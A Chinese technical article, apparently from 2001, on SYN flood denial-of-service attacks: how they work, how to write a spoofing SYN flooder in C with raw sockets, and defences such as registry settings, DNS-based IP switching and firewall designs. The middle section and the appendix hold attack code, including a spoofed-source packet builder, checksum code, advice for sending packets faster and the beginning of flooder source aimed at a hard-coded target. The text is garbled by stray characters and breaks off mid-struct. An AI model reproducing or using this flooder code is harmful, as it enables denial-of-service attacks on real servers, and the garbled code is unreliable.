SYNFlood攻击的基本原理及防御

SYNFlｏod攻击的基本原理及防御

文章来源：HYPERＬＩNK"ｈttp://shｏtｇun．patｃhｉng。ｎet／syｎ。htm"\t＂_blａnk＂http：／／shｏtgun。patching.nｅt/syn。hｔｍﻫﻫ第一部分SYNFloｏd的基本原理

ﻫﻫﻫSYNＦlｏod是当前最流行的ＤｏS（拒绝服务攻击）与DDoS（分布式拒绝服务攻击）的方式之一,这是一种利用TCＰ协议缺陷,发送大量伪造的TCＰ连接恳求,从而使得被攻击方资源耗尽（CＰＵ满负荷或内存不足）的攻击方式。ﻫﻫ要明白这种攻击的基本原理,还是要从TCＰ连接建立的过程开头说起：

ﻫ大家都知道，ＴCP与UＤＰ不同，它是基于连接的，也就是说：为了在服务端和客户端之间传送TCP数据,必须先建立一个虚拟电路,也就是TCP连接,建立TＣP连接的标准过程是这样的：

ﻫ首先，恳求端（客户端)发送一个包含SYN标志的TCP报文，ＳＹN即同步(Synｃｈronｉze),同步报文会指明客户端使用的端口以及TCＰ连接的初始序号;

ﻫﻫ其次步，服务器在收到客户端的SＹN报文后，将返回一个SYN+AＣK的报文，表示客户端的恳求被接受,同时ＴCP序号被加一,ACK即确认(Ａcknowlｅdｇemｅｎt)。

ﻫﻫ第三步,客户端也返回一个确认报文ACK给服务器端，同样ＴCP序列号被加一,到此一个ＴＣＰ连接完成。

以上的连接过程在TCＰ协议中被称为三次握手（Ｔhree－waｙHａndｓhaｋe）。

ﻫ

ﻫﻫ问题就出在TＣP连接的三次握手中，假设一个用户向服务器发送了ＳYN报文后突然死机或掉线,那么服务器在发出SYN＋ＡCＫ应答报文后是无法收到客户端的AＣK报文的(第三次握手无法完成），这种情况下服务器端一般会重试(再次发送ＳＹN＋AＣK给客户端）并等待一段时间后丢弃这个未完成的连接，这段时间的长度我们称为SYＮＴimeout，一般来说这个时间是分钟的数量级（大约为30秒－2分钟）；一个用户消灭特别导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个格外大的半连接列表而消耗格外多的资源-－——数以万计的半连接，即使是简洁的保存并遍历也会消耗格外多的CＰU时间和内存,何况还要不断对这个列表中的IＰ进行SYＮ+ACＫ的重试。实际上如果服务器的ＴＣP／IP栈不够强大,最后的结果往往是堆栈溢出崩溃－--即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的ＴCＰ连接恳求而无暇理睬客户的正常恳求（毕竟客户端的正常恳求比率格外之小）,此时从正常客户的角度看来,服务器失去响应，这种情况我们称作：服务器端受到了SYNＦlood攻击(SYN洪水攻击)。

ﻫ

ﻫﻫ从防御角度来说，有几种简洁的解决方法,第一种是缩短SYNTｉmeｏut时间，由于ＳＹNＦｌood攻击的效果取决于服务器上保持的SYＮ半连接数，这个值＝SYN攻击的频度x

SＹNＴimeｏuｔ，所以通过缩短从接收到SＹＮ报文到确定这个报文无效并丢弃改连接的时间，例如设置为2０秒以下（过低的SYＮTｉｍeout设置可能会影响客户的正常访问）,可以成倍的降低服务器的负荷。ﻫﻫ

其次种方法是设置SYＮＣｏokｉe，就是给每一个恳求连接的ＩＰ地址安排一个Cookie,如果短时间内连续受到某个ＩP的重复ＳYＮ报文，就认定是受到了攻击，以后从这个IP地址来的包会被一概丢弃.

ﻫ

可是上述的两种方法只能应付比较原始的SYNＦlooｄ攻击，缩短ＳYＮTimeout时间仅在对方攻击频度不高的情况下生效，SYＮＣoｏkｉｅ更依靠于对方使用真实的ＩP地址，如果攻击者以数万/秒的速度发送SＹN报文,同时利用SOCK_RAW随机改写ＩP报文中的源地址，以上的方法将毫无用武之地。ﻫﻫ

ﻫ

ﻫﻫ

ﻫﻫ

ﻫﻫ

ﻫﻫ

ﻫﻫ

其次部份SYＮFloｏdｅr源码解读

ﻫ

ﻫ

下面我们来分析SYNFloｏdｅr的程序实现。ﻫﻫ首先，我们来看一下ＴＣP报文的格式：ﻫﻫ

ﻫ０

1

２

3

４

5

6ﻫ

０２４680２4６8024６８0２４6８02468０２46８024ﻫﻫ

＋—+—+—+－+－＋－+-+—＋—+—+—+－+-＋－+—＋—+-＋—+-+—+-＋－＋—＋－+-＋-+－＋—+-+-+－＋—+ﻫ

|

ＩＰ首部

｜

TCＰ首部

｜

ＴCP数据段

｜ﻫﻫ+－+－+－+-+-＋—+—+—+－+－+－＋－＋—+—+—＋－+-＋-+－+—＋－＋—+-+-+－＋－＋-＋—＋—+-+-+—+

ﻫ

图一TCP报文结构

ﻫﻫ

ﻫﻫ如上图所示，一个ＴCP报文由三个部分构成：２0字节的IP首部、２0字节的ＴCP首部与不定长的数据段，（实际操作时可能会有可选的IＰ选项，这种情况下ＴCＰ首部向后顺延)由于我们只是发送一个ＳYＮ信号，并不传递任何数据,所以TCP数据段为空.TCＰ首部的数据结构为：

ﻫﻫ

0

１

2

3

ﻫﻫ

0１2３4567８9０１234567８９01２345６789012ﻫﻫ

+—+—+—+－+－＋-＋－＋-+－＋—+—+—＋-+-+—+-+—+-+—＋－＋—＋－＋－＋－+-+—+—+-＋—+—+—＋－＋ﻫﻫ

｜

十六位源端口号

｜

十六位目标端口号

|

ﻫ

＋—+—＋－＋-+－+—＋—+-＋—＋－+－+－+-+—+-+－＋—＋-+—+-＋—+－+－+－+-＋—+-+-+—+－+-+-+ﻫﻫ

|

三十二位序列号

|ﻫﻫ

＋—＋－+-＋－+－+—+—+—+-+-+-＋—＋－+－+—+—+—+-＋－+－＋－＋—＋－＋－+－＋－＋－+—+—+-+－＋－＋ﻫﻫ

｜

三十二位确认号

|

ﻫ

＋—＋—+－＋－+－+-+-+—+-+－+-＋－＋-+-+-+－＋-+—+—＋—＋—+—+-＋-+—+—+-+－+－+-＋－+—+ﻫﻫ

|四位

｜

｜U｜A｜Ｐ|R|Ｓ｜Ｆ｜

|ﻫﻫ

｜首部

|六位保留位|Ｒ|C|Ｓ|S｜Y|I|

十六位窗口大小

｜

ﻫ

|长度

｜

|Ｇ｜K|H｜T｜N｜Ｎ|

｜ﻫﻫ

＋－＋－+－+－+-+—+-＋-+-+—＋—＋-+-＋-+－+-＋－+—＋-＋—＋－＋—+—+-+—+－+－+－＋－+－＋－+—+ﻫﻫ

｜

十六位校验和

｜

十六位紧急指针

|ﻫﻫ

+-+－＋-＋－+－＋-＋-+—+-+-+-+-＋-+-+—+－+－＋－+—+－+-+—＋－＋－+—＋-+-+—+-+－+—+－+

ﻫ

｜

选项(若有）

｜ﻫﻫ

+—+—＋—+—＋－+-+—+－＋-＋—+-+—＋-＋—+-+—+－＋－+－+－＋－+－+－＋—+-+—+—+—+－+－+-+-+ﻫﻫ

|

数据(若有）

｜ﻫﻫ

+—＋—+-+-+－＋－+—+-+—+-+-+-+-＋-+—＋－+-+-＋-+-+－+—+—＋—+-+-+—+-+－+—＋-+-+ﻫﻫ

图二

TCP首部结构

ﻫﻫ

ﻫﻫ依据TCP报文格式,我们定义一个结构ＴCP_HEＡDER用来存放TCP首部：ﻫﻫｔypedeｆsｔrｕct_tcpｈｄr

ﻫﻫ｛ﻫﻫ

USHORＴtｈ_spoｒt；

//１６位源端口ﻫﻫ

ＵＳＨＯＲＴｔh_dpｏrt；

/／16位目的端口ﻫﻫ

uｎsigneｄiｎｔｔh_seq;

//32位序列号ﻫﻫ

ｕｎsignｅdiｎtth_ａck;

//32位确认号

ﻫ

ｕnｓignedchaｒtｈ_lenreｓ;

／／4位首部长度+6位保留字中的４位ﻫﻫ

unsigｎedｃｈarth_flａｇ；

／/２位保留字＋6位标志位ﻫﻫ

UＳＨＯRＴｔh＿wｉn;

//１6位窗口大小ﻫ

ＵSHORＴtｈ_sum;

//16位校验和ﻫﻫ

USＨＯRTth_urp;

／/１6位紧急数据偏移量

ﻫ｝TCＰ_HＥAＤＥＲ;

ﻫ通过以正确的数据填充这个结构并将TCP_HEADER.tｈ_flaｇ赋值为2（二进制的00000０1０）我们能制造一个SYN的TCP报文,通过大量发送这个报文可以实现SＹNFｌood的效果.但是为了进行IP哄骗从而隐藏自己,也为了躲避服务器的SYNCｏoｋｉｅ检查，还需要直接对IＰ首部进行操作:ﻫ

０

1

２

３

0１2345６7８90１234５6789012３４5６７８９0１２

ﻫ

+－+－+-+-＋-＋－＋-＋－+－+-+-＋—＋—＋-+—＋—＋－+—+－＋-＋-＋-＋-+－+—＋-+—+－+-+－+-＋—+ﻫﻫ

|版本

｜长度

｜八位服务类型

|

十六位总长度

｜

ﻫ

+－+-+-+－+—＋－+-+—+－＋—＋-+—+-+—+－+－+-+-+－+－+-+—+—+－＋-+—＋－＋－+－＋-+—＋-＋ﻫﻫ

｜

十六位标识

｜标志｜

十三位片偏移

|

ﻫ

＋-＋—+—＋-+-+-＋—+－+-+-＋－＋—+—+—＋-+—＋－+—+-+-+—＋—+—+—+－+-+—＋—＋-＋-+—+－+ﻫﻫ

｜八位生存时间

|

八位协议

｜

十六位首部校验和

｜

ﻫ

+－+－＋-＋－+－+-＋－+-+-＋-+-+-+－+—+－+-+-+－＋—+-+—＋—+—+—＋—+－+－+-+－＋—+-+-+

ﻫ

|

三十二位源IP地址

|ﻫﻫ

+—＋－+—+－+－＋-+-＋－+－+－+-+－＋-+-+-+—+-+—+—+－＋－+－+—+—+—+—+-+-+－＋—+－＋—＋ﻫﻫ

｜

三十二位目的IＰ地址

|ﻫﻫ

＋－+-＋-＋-＋－+—+—＋—+—+－＋-+-+－+—＋－＋-＋-+—+—+—+—+－+－+-+—+—＋—＋—+-＋-+—+-+

ﻫ

|

选项（若有）

|ﻫﻫ

＋—+—+—+—+—+—+-+—＋—＋—+—+—+-+-+－+－+-+-+—+－+—＋－+—+－+－+-＋-＋—+-＋—＋—+-+ﻫﻫ

|

数据

｜

ﻫ

+-+-+－＋-+—+—+－+-＋－+－+-+-＋-+—+-+-+-＋-+—+-+-+-＋-+—+—+－＋-+—＋－+—+-+—+ﻫ

图三

ＩP首部结构ﻫﻫ同样定义一个IＰ＿HEADER来存放ＩＰ首部

ﻫtｙｐedｅｆｓtruct_ｉｐｈdｒﻫﻫ｛ﻫﻫ

ｕｎsigneｄcharh_verlｅn；

／/４位首部长度+4位IP版本号ﻫﻫ

unｓiｇnedcharｔoｓ；

//８位服务类型TOＳﻫﻫ

unｓｉｇnedｓhoｒttｏtaｌ＿leｎ；

/／1６位总长度（字节)ﻫﻫ

ｕnsｉｇnedsｈortｉdｅnt;

//16位标识

uｎｓigｎedｓｈoｒｔfｒaｇ_ａｎd_ｆlａgs；

／/３位标志位ﻫ

unsignedchar

ｔtl；

//8位生存时间ＴＴＬﻫ

unsigｎｅdcｈaｒpｒoto；

//８位协议号（TCP，ＵＤP或其他)ﻫﻫ

uｎｓigｎedshortｃhecｋｓuｍ；

//16位IP首部校验和ﻫﻫ

ｕnsignedｉntsourceＩＰ；

//３2位源IP地址ﻫﻫ

unｓiｇnedinｔdesｔIP;

//32位目的IＰ地址

ﻫ}IP＿HEADER;ﻫﻫ然后通过SockＲａw=WSASocket（AF_IＮET,SＯCＫ_RAＷ,IPPRＯＴO_RAＷ,NUＬL,０,WSA_ＦLAＧ_OＶERLＡPＰED））；ﻫﻫ

建立一个原始套接口，由于我们的ＩP源地址是伪造的,所以不能指望系统帮我们计算IP校验和,我们得在在ｓeｔsockｏpt中设置IP_HＤＲINCＬ告知系统自己填充ＩP首部并自己计算校验和:ﻫﻫ

flag=ＴＲＵE；ﻫ

seｔsockopt(SockRaw，IPPROTＯ_IP，IP＿ＨDRINCＬ,（cｈａｒ＊）＆flａg,siｚeｏf（ｉｎt)）；

ﻫＩP校验和的计算方法是:首先将IＰ首部的校验和字段设为0(IP_HEAＤER．cｈｅcｋsum＝０），然后计算整个IＰ首部（包括选项)的二进制反码的和,一个标准的校验和函数如下所示:ﻫﻫUSHORＴcｈｅcksum（ＵＳＨORT＊bufｆeｒ，inｔｓｉze)ﻫﻫ｛

ﻫﻫunsigｎｅdloｎｇcｋｓuｍ=0；ﻫﻫ

ｗhile（size>1）｛

ﻫ

ｃｋｓｕm＋=＊ｂuffｅｒ＋＋；ﻫﻫ

sｉze-=siｚeof(USHORＴ);ﻫﻫ

｝ﻫﻫ

if（sｉze）ckｓum+=*(ＵCHAR*)bｕｆｆeｒ;ﻫﻫ

cｋsum=(cksuｍ＞>１6)+（ｃｋsｕm&０xffff）;ﻫﻫ

cksｕm+=（ｃksuｍ〉＞16);ﻫﻫ

rｅｔurn(USHOＲT）（~ｃｋｓｕm);ﻫ

｝ﻫﻫ这个函数并没有经过任何的优化,由于校验和函数是ＴＣP/IP协议中被调用最多函数之一,所以一般说来,在实现TＣＰ/IＰ栈时，会依据操作系统对校验和函数进行优化。

TCP首部检验和与ＩP首部校验和的计算方法相同，在程序中使用同一个函数来计算。ﻫﻫ需要注意的是,由于TＣＰ首部中不包含源地址与目标地址等信息，为了保证TCP校验的有效性，在进行ＴCP校验和的计算时,需要增加一个TＣP伪首部的校验和，定义如下：ﻫﻫｓｔruct

ﻫﻫ｛ﻫ

unsｉgnｅdｌｏngｓａｄｄr;

//源地址ﻫﻫ

ｕnsiｇneｄloｎｇｄａｄdr;

／／目的地址

ﻫ

chaｒｍbz；

//置空ﻫﻫ

ｃharptcl；

／/协议类型ﻫﻫ

ｕnｓignｅｄshorttｃpl；

//ＴCＰ长度ﻫﻫ}pｓd_headeｒ；ﻫﻫ然后我们将这两个字段复制到同一个缓冲区SｅｎdＢuf中并计算TCP校验和：

ﻫmｅｍcpy（SenｄBuf，＆psd_heaｄer,siｚeof（psｄ_headeｒ)）；

memcｐｙ（ＳeｎｄＢuf+ｓｉzeoｆ(psd_hｅａder),＆tcp_heａder,sizeoｆ(tcp＿header)）;ﻫﻫ

ｔｃp_ｈeａdeｒ.th＿sum=checksｕm(（UＳＨOＲT＊）SeｎdBuｆ,sizｅoｆ(ｐｓd_ｈeadeｒ）＋sizeoｆ(ｔcp_hｅaｄer))；ﻫﻫ计算IP校验和的时候不需要包括TCP伪首部:

mｅｍｃpy（ＳeｎdＢｕf，&iｐ＿heａder,siｚｅｏｆ（ｉp_ｈeaｄer））；ﻫﻫ

meｍｃpｙ（SendBuｆ＋sｉzｅof(ip＿ｈeaｄer）,＆tcｐ_heaｄeｒ,ｓｉzeoｆ（tcｐ_hｅａdeｒ）)；

ﻫ

ip_heａdeｒ。checksum=checksum（(ＵＳHORＴ*）ＳｅnｄBuｆ，sｉzｅｏf(ip_headｅr）＋sizｅof（tｃｐ＿hｅａdｅｒ))；ﻫ

再将计算过校验和的IP首部与ＴCP首部复制到同一个缓冲区中就可以直接发送了：ﻫﻫ

memcpy(ＳｅｎdBｕｆ，&ｉｐ_hｅaｄeｒ，sizeof（iｐ＿header））；

ｓeｎｄtｏ(SｏckＲａw，SeｎｄＢｕｆ，daｔａsize,0，(sｔrucｔsocｋadｄr＊）&DestAddｒ，sizｅof（DeｓtAddr)）;

ﻫ

ﻫﻫ由于整个TCP报文中的全部部分都是我们自己写入的(操作系统不会做任何干涉）,所以我们可以在ＩP首部中放置随机的源IP地址,如果伪造的源IP地址确实有人使用，他在接收到服务器的ＳＹN＋ACK报文后会发送一个RＳT报文（标志位为00000１0０），通知服务器端不需要等待一个无效的连接，可是如果这个伪造IＰ并没有绑定在任何的主机上，不会有任何设备去通知主机该连接是无效的（这正是ＴＣP协议的缺陷），主机将不断重试直到SYNTimeｏut时间后才能丢弃这个无效的半连接。所以当攻击者使用主机分布很稀疏的ＩP地址段进行伪装IP的ＳYNFloｏｄ攻击时，服务器主机承受的负荷会相当的高,依据测试,一台ＰIIＩ550MＨz+128ＭB+１00Mbps的机器使用经过初步优化的SYＮＦlooder程序可以以16,0００包/秒的速度发送ＴＣＰSYN报文，这样的攻击力已经足以拖垮大部分ＷEB服务器了。

ﻫ

略微动动脑筋我们就会发现，想对SYNFｌooder程序进行优化是很简洁的，从程序构架来看，攻击时循环内的代码主要是进行校验和计算与缓冲区的填充，一般的思路是提高校验和计算的速度,我甚至见过用汇编代码编写的校验和函数，实际上，有另外一个变通的方法可以轻松实现优化而又不需要高深的编程技巧和数学知识，(狡猾说吧，我数学比较差：P），我们仔细讨论了两个不同源地址的ＴCPＳＹN报文后发现，两个报文的大部分字段相同(比如目的地址、协议等等），只有源地址和校验和不同（如果为了隐蔽，源端口也可以有变化，但是并不影响我们算法优化的思路）,如果我们事先计算好大量的源地址与校验和的对应关系表（如果其他的字段有变化也可以加入这个表），等计算完毕了攻击程序就只需要单纯的组合缓冲区并发送(用指针来直接操作缓冲区的特定位置，从事先计算好的对应关系表中读出数据,替换缓冲区相应字段）,这种简洁的工作完全取决于系统发送IＰ包的速度,与程序的效率没有任何关系,这样,即使是ＣPU主频较低的主机也能快速的发送大量ＴCＰＳＹN攻击包。如果考虑到缓冲区拼接的时间，甚至可以定义一个很大的缓冲区数组，填充完毕后再发送(雏鹰给这种方法想了一个很贴切的比方：火箭炮装弹虽然很慢,但是一旦炮弹上膛了以后就可以连续猛烈地放射了:）.

ﻫ

ﻫﻫ

ﻫ

ﻫ

ﻫﻫ

ﻫﻫ第三部分SYＮFlｏod攻击的监测与防御初探ﻫﻫ

对于ＳYNFｌｏod攻击,目前尚没有很好的监测和防御方法，不过如果系统管理员熟识攻击方法和系统架构,通过一系列的设定，也能从肯定程度上降低被攻击系统的负荷，减轻负面的影响。(这正是我撰写本文的主要目的)ﻫﻫ

一般来说,如果一个系统（或主机）负荷突然上升甚至失去响应，使用Netsｔａt命令能看到大量SＹＮ_RCVＤ的半连接(数量>５00或占总连接数的10％以上)，可以认定,这个系统(或主机）遭到了ＳＹNＦlooｄ攻击.ﻫﻫ

遭到SＹＮFloｏd攻击后，首先要做的是取证,通过Ｎeｔstat–ｎ–ｐtcp〉reｓａult。txt记录目前全部TCP连接状态是必要的，如果有嗅探器，或者TcpＤｕmp之类的工具，记录ＴＣPSYN报文的全部细节也有助于以后追查和防御，需要记录的字段有：源地址、IP首部中的标识、ＴCP首部中的序列号、TTL值等,这些信息虽然很可能是攻击者伪造的，但是用来分析攻击者的心理状态和攻击程序也不无帮助。格外是TＴL值，如果大量的攻击包似乎来自不同的ＩP但是TＴL值却相同，我们往往能推断出攻击者与我们之间的路由器距离，至少也可以通过过滤特定TTL值的报文降低被攻击系统的负荷（在这种情况下TＴL值与攻击报文不同的用户就可以恢复正常访问）

前面曾经提到可以通过缩短SYNTimeout时间和设置SYNCoｏkｉe来进行SYN攻击保护，对于Ｗｉｎ2０00系统，还可以通过修改注册表降低SＹＮFｌoｏd的危害,在注册表中作如下改动:ﻫﻫ首先，打开regedｉt,找到HＫEＹ＿ＬOＣAL_ＭACHＩＮE\Sｙｓtｅｍ\ＣurrｅntCｏnｔrolSｅt\Seｒviｃes＼Tcpｉp\Ｐａrameteｒs

ﻫﻫ增加一个SyｎＡttackPｒoｔect的键值，类型为ＲEＧ＿ＤWＯRD，取值范围是0-2，这个值决定了系统受到SＹＮ攻击时实行的保护措施,包括削减系统SYN+ＡCK的重试的次数等，默认值是0（没有任何保护措施），推举设置是2；

ﻫﻫ增加一个TｃpMaxHａｌｆOpen的键值,类型为REG＿ＤWOＲD,取值范围是１00－０xFFFF,这个值是系统允许同时打开的半连接,默认情况下ＷIN２ＫPRO和SERVＥR是1０0,ＡDＶＡNＣEＤSERＶER是500,这个值很难确定，取决于服务器TCP负荷的状况和可能受到的攻击强度,简略的值需要经过试验才能决定.

ﻫ

增加一个TｃｐMaxHａlfＯpenRｅｔｒiｅd的键值，类型为RＥＧ_DWＯRD，取值范围是8０—0xFFFF，默认情况下WIN2KPRO和ＳEＲVEＲ是8０，ADＶANCＥＤSERVEＲ是４00，这个值决定了在什么情况下系统会打开ＳYN攻击保护.

ﻫﻫ

我们来分析一下Ｗin2000的ＳＹN攻击保护机制：正常情况下，Ｗｉn2Ｋ对TCP连接的三次握手有一个常规的设置,包括SYNTｉmｅｏｕｔ时间、SYN—ACK的重试次数和SYN报文从路由器到系统再到Winsｏｃk的延时等,这个常规设置是针对系统性能进行优化的(平安和性能往往相互冲突）所以可以给用户供应便利快捷的服务；一旦服务器受到攻击,ＳYN半连接的数量超过TｃpＭａxHalｆOｐenRetrｉed的设置,系统会认为自己受到了SＹNＦｌood攻击,此时设置在SｙnAttａcｋProｔect键值中的选项开头作用，SＹNＴimeｏuｔ时间被减短,SYN－ACK的重试次数削减，系统也会自动对缓冲区中的报文进行延时，避开对ＴCP/IP堆栈造成过大的冲击,力图将攻击危害减到最低；如果攻击强度不断增大,超过了TｃｐMａxHaｌfＯｐen值，此时系统已经不能供应正常的服务了，更重要的是保证系统不会崩溃,所以系统将会丢弃任何超出ＴｃpMａxＨalｆOpen值范围的ＳYN报文（应该是使用随机丢包策略),保证系统的稳定性.

ﻫﻫ

所以，对于需要进行SYN攻击保护的系统,我们可以测试/猜测一下访问峰值时期的半连接打开量,以其作为参考设定ＴcｐMaxＨａlfＯｐｅnRｅｔriｅd的值（保留肯定的余量），然后再以TcpＭaｘHaｌｆＯpｅnRetｒiｅd的1。25倍作为TcpＭaｘHａlfOpｅｎ值，这样可以最大限度地发挥WIＮ2K自身的ＳＹＮ攻击保护机制。

ﻫﻫ

通过设置注册表防御SＹNＦｌoｏｄ攻击,采纳的是“挨打”的策略，无论系统如何强大，始终不能光靠挨打支撑下去,除了挨打之外，“退让”也是一种比较有效的方法。

ﻫﻫ

退让策略是基于ＳＹＮＦｌood攻击代码的一个缺陷,我们重新来分析一下SYNＦlｏod攻击者的流程：SYＮFlood程序有两种攻击方式，基于IＰ的和基于域名的,前者是攻击者自己进行域名解析并将ＩP地址传递给攻击程序，后者是攻击程序自动进行域名解析,但是它们有一点是相同的，就是一旦攻击开头，将不会再进行域名解析，我们的切入点正是这里：假设一台服务器在受到SYNFlｏod攻击后飞快更换自己的IＰ地址,那么攻击者仍在不断攻击的只是一个空的IP地址,并没有任何主机,而防御方只要将DNS解析更改到新的IP地址就能在很短的时间内(取决于DNＳ的刷新时间）恢复用户通过域名进行的正常访问。为了迷惑攻击者，我们甚至可以放置一台“牺牲"服务器让攻击者满意于攻击的“效果”（由于DＮS缓冲的缘由，只要攻击者的扫瞄器不重起，他访问的仍然是原先的IＰ地址)。

ﻫﻫ

同样的缘由,在众多的负载均衡架构中，基于DNS解析的负载均衡本身就拥有对SＹNFloｏｄ的免疫力，基于DNS解析的负载均衡能将用户的恳求安排到不同ＩP的服务器主机上,攻击者攻击的永久只是其中一台服务器，虽然说攻击者也能不断去进行DNS恳求从而打破这种“退让”策略，但是一来这样增加了攻击者的成本，二来过多的ＤＮＳ恳求可以帮助我们追查攻击者的真正踪迹（DNＳ恳求不同于ＳＹＮ攻击,是需要返回数据的,所以很难进行ＩP伪装)。

ﻫﻫ

ﻫﻫ

对于防火墙来说,防御SYＮFlｏｏｄ攻击的方法取决于防火墙工作的基本原理，一般说来,防火墙可以工作在TＣP层之上或ＩP层之下，工作在TCP层之上的防火墙称为网关型防火墙，网关型防火墙与服务器、客户机之间的关系如下图所示：

ﻫﻫ

ﻫﻫ外部TＣP连接

内部TCP连接

ﻫﻫ

[客户机]＝======＝=＝=======>［防火墙］====＝======＝=====〉[服务器］

ﻫﻫ

ﻫ

如上图所示，客户机与服务器之间并没有真正的TCP连接，客户机与服务器之间的全部数据交换都是通过防火墙代理的,外部的ＤNS解析也同样指向防火墙,所以如果网站被攻击，真正受到攻击的是防火墙,这种防火墙的优点是稳定性好，抗打击能力强，但是由于全部的TCＰ报文都需要经过防火墙转发，所以效率比较低由于客户机并不直接与服务器建立连接，在TCＰ连接没有完成时防火墙不会去向后台的服务器建立新的TＣP连接,所以攻击者无法越过防火墙直接攻击后台服务器，只要防火墙本身做的足够强壮,这种架构可以抵抗相当强度的SYNＦlｏoｄ攻击。但是由于防火墙实际建立的ＴＣP连接数为用户连接数的两倍(防火墙两端都需要建立TＣP连接）,同时又代理了全部的来自客户端的TCP恳求和数据传送，在系统访问量较大时,防火墙自身的负荷会比较高,所以这种架构并不能适用于大型网站.(我感觉,对于这样的防火墙架构,使用TCP＿ＳＴATＥ攻击估量会相当有效:）

ﻫﻫ

工作在IP层或ＩＰ层之下的防火墙（路由型防火墙）工作原理有所不同，它与服务器、客户机的关系如下图所示：

［防火墙]数据包修改转发

ﻫﻫ

[客户机］＝==＝＝＝＝=|=＝==＝＝＝＝====＝==＝＝======〉[服务器]

ﻫﻫTCP连接

ﻫﻫ

ﻫﻫ

客户机直接与服务器进行ＴCＰ连接，防火墙起的是路由器的作用，它截获全部通过的包并进行过滤，通过过滤的包被转发给服务器，外部的DＮS解析也直接指向服务器，这种防火墙的优点是效率高，可以适应1００Ｍｂｐs-1Gｂps的流量，但是这种防火墙如果配置不当,不仅可以让攻击者越过防火墙直接攻击内部服务器，甚至有可能放大攻击的强度,导致整个系统崩溃。

ﻫ

在这两种基本模型之外,有一种新的防火墙模型，我个人认为还是比较奇妙的，它集中了两种防火墙的优势，这种防火墙的工作原理如下所示：

ﻫ

第一阶段，客户机恳求与防火墙建立连接：

ﻫﻫSYN

SYN＋ACＫ

ACK

ﻫﻫ

[客户机］—－-－〉[防火墙］

=〉

［防火墙］－—-—-—-->[客户机］

=〉

［客户机］－——>［防火墙］

ﻫﻫ

其次阶段,防火墙伪装成客户机与后台的服务器建立连接

ﻫ

[防火墙]<＝======＝＝＝＝〉［服务器］

ﻫ

ＴＣＰ连接

ﻫ

ﻫﻫ

第三阶段,之后全部从客户机来的TCP报文防火墙都直接转发给后台的服务器

ﻫ防火墙转发

ﻫ［客户机]＜===＝=＝｜====＝==>［服务器]

ﻫ

TCP连接

ﻫﻫ

这种结构吸取了上两种防火墙的优点,既能完全掌握全部的ＳYN报文，又不需要对全部的TＣP数据报文进行代理，是一种两全其美的方法。

ﻫﻫ近来,国外和国内的一些防火墙厂商开头讨论带宽掌握技术，如果能真正做到严格掌握、安排带宽，就能很大程度上防御绝大多数的拒绝服务攻击,我们还是拭目以待吧.

ﻫﻫ

ﻫﻫ附录：Win200０下的ＳＹNFlｏod程序

ﻫ改编自Ｌinｕｘ下Ｚａkath编写的SＹNFｌooder

ﻫ编译环境：VC++6．0，编译时需要包含ws2_32．lｉbﻫ

/／///／／///////／////／//／/／／/／////////／///／／/／/／//／//／／///／/／////////／/／／／//

ﻫ／/

/／ﻫ

/／

SＹNFlｏodｅrＦｏｒWｉｎ2ＫbyShoｔｇun

/／ﻫﻫ//

／/

ﻫ／/

THISＰROGRAMISMＯＤIＦIEDFROMALIＮUXＶEＲSＩＯNBYZａkａth

//

ﻫ/／

THANXLionHookＦＯRＰROGRAMOPＴＩMIＺＡＴIＯN

//ﻫﻫ//

／／

ﻫ//

Ｒeleasｅd：

［2001。４]

／/ﻫ

//

Author:

［Ｓｈotgun]

/／

ﻫ//

Hｏｍeｐａｇｅ:

／/

ﻫ/／

［ＨYＰＥRＬINK\t＂_blａnk＂htｔp://ＩT.Xici.Net］

/／ﻫ

//

［HYPERLＩNＫ＼t”＿blａnk"ｈttp:／/WＷW．Ｐatchｉｎg．Neｔ］

//ﻫﻫ／/

//

ﻫ//／//////////／//／/／／///／／／////／／／／//／/／/／//／/／/／//／／//////／//／／///////////ﻫ

#ｉncｌｕde＜wｉnsock２.h〉ﻫ

#ｉncｌudｅ〈Ｗｓ2tcｐｉp.h〉

#ｉnclｕｄｅ＜stｄio．ｈ〉ﻫ

#inｃludｅ<ｓtdlｉｂ。h〉ﻫﻫ＃defineSEQ0x28376839ﻫ

＃defineＳYＮ_ＤEＳT＿IＰ”1９２.１68．１5。２5０”//被攻击的IＰﻫﻫ＃defineFAＫE_ＩＰ＂10．１68.1５0．1"

//伪装IP的起始值，本程序的伪装ＩP掩盖一个Ｂ类网段ﻫﻫ＃defｉｎｅSＴＡＴUS＿FAILＥD0xFFFF

/／错误返回值

ﻫ

ﻫﻫtypeｄｅfｓtruct_iphｄｒ

/／定义ＩP首部ﻫ

{

ﻫ

unsignｅdcｈaｒh_vｅrlen；

//4位首部长度,4位ＩP版本号ﻫ

unsigｎedchartｏs；

/／８位服务类型TOSﻫﻫ

unｓigｎｅdshｏｒtｔoｔａl_lｅｎ;

／/1６位总长度(字节）ﻫﻫ

unｓigｎｅdshｏrtident;

/／１6位标识ﻫﻫ

ｕｎsｉgnedｓhoｒtｆrag＿anｄ＿fｌａｇｓ;

//3位标志位ﻫﻫ

unsｉgnｅdchar

ttl;

／／８位生存时间ＴTLﻫﻫ

unｓｉｇnedchaｒproto;

/／8位协议(TCP,UＤP或其他）ﻫﻫ

uｎsiｇneｄsｈｏrtcheｃksum;

/／１６位ＩＰ首部校验和ﻫﻫ

ｕnsiｇnｅsourcｅIP;

／/32位源IP地址

ﻫ

uｎsｉｇnedｉｎtdestIP；

／／３2位目的IＰ地址ﻫﻫ}IP_HEADER；ﻫ

ﻫﻫstｒuct

//定义TCP伪首部

ﻫ｛ﻫﻫ

ｕｎｓignedlｏngsaddr;

／/源地址ﻫ

unsignedlｏｎgdadｄr;

//目的地址ﻫ

charmbｚ;ﻫﻫ

charptcl;

／/协议类型ﻫﻫ

ｕnｓｉｇｎedｓｈorttcｐl；

/／ＴＣＰ长度ﻫﻫ｝psd＿hｅader；ﻫ

ﻫﻫtypeｄefstruct_tcｐhdｒ

／／定义TCP首部

ﻫ{ﻫﻫ

USHＯＲTｔh＿sport；

/／16位源端口ﻫﻫ

ＵＳＨＯＲTｔh_ｄport；

/／16位目的端口

ﻫ

uｎsｉｇnedｉnttｈ＿sｅq；

／/32位序列号ﻫ

unｓignｅｄiｎｔtｈ＿ａcｋ；

//3２位确认号ﻫﻫ

unｓigneｄchaｒth_ｌenｒes；

//4位首部长度／６位保留字ﻫ

unsｉgnedcｈａrtｈ_fｌag;

/／6位标志位ﻫﻫ

USHORTtｈ_ｗin；

